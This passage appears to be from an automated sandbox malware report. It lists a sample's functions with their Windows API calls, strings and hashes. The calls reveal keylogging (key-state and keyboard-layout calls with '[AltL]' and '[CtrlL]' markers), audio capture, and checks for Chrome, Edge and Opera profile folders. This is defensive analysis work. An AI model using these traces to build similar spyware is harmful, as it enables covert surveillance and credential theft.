                                                                                                                                                                                      • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                                                                                                                                      • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                                      • String ID: XMG
                                                                                                                                                                                      • API String ID: 2315374483-813777761
                                                                                                                                                                                      • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                                                      • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                                                      • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                                      • API String ID: 1174141254-4188645398
                                                                                                                                                                                      • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                                                                                                                                                                      • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                                      • API String ID: 1174141254-2800177040
                                                                                                                                                                                      • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                                                                                                                                                                      • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                                                                                                                                                                      • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                      • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                                      • API String ID: 1174141254-1629609700
                                                                                                                                                                                      • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                                                                                                                                                                      • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                                                                                                                                        • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                                                                                                                                        • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                                                                                                                        • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                                                                                                                        • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                                                                                                                                        • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                                                                                                                                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                                                                                                                        • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                                                                                                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                      • String ID: [AltL]$[AltR]
                                                                                                                                                                                      • API String ID: 2738857842-2658077756
                                                                                                                                                                                      • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                                                                                                                                                                      • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Time$FileSystem
                                                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                                                                                                                                                                      • API String ID: 2086374402-949981407
                                                                                                                                                                                      • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                                                                                                                                                                      • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                                                                                                                                                      • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                                                                                                                                                                      • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                                      • String ID: !D@$open
                                                                                                                                                                                      • API String ID: 587946157-1586967515
                                                                                                                                                                                      • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                                                                                                                                                                      • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                                                                                                                                                      • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___initconout.LIBCMT ref: 0045555B
                                                                                                                                                                                        • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                                                                                                                                                                      • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleCreateFileWrite___initconout
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 3087715906-263838557
                                                                                                                                                                                      • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                                                                                                                      • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                                                                                                                                                                      • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: State
                                                                                                                                                                                      • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                      • API String ID: 1649606143-2446555240
                                                                                                                                                                                      • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                                                                                                                                                                      • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Init_thread_footer__onexit
                                                                                                                                                                                      • String ID: ,kG$0kG
                                                                                                                                                                                      • API String ID: 1881088180-2015055088
                                                                                                                                                                                      • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                                                                                      • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                                                                                                                                      • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                                                                                                                                                                      • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%